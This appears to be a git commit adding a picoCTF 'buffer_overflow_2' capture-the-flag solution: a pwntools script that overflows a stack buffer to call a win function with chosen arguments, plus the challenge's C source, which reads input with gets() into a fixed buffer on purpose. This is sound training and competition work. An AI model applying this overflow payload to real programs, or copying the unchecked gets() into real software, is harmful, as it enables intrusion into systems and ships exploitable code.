pwn/buffer_overflow_2

This commit is contained in:
Oystein Kristoffer Tveit 2024-09-03 19:46:13 +02:00
parent 2e33defa56
commit c56300256d
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
3 changed files with 74 additions and 0 deletions

31
pwn/buffer_overflow_2/solve.py Executable file
View File

@ -0,0 +1,31 @@
#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
print(r.recvuntil(b"Please enter your string:"))
offset = 112 # found with pwndbg
payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
r.sendline(payload)
print(r.recvall())
r.close()
if __name__ == "__main__":
main()

BIN
pwn/buffer_overflow_2/vuln Executable file

Binary file not shown.

View File

@ -0,0 +1,43 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}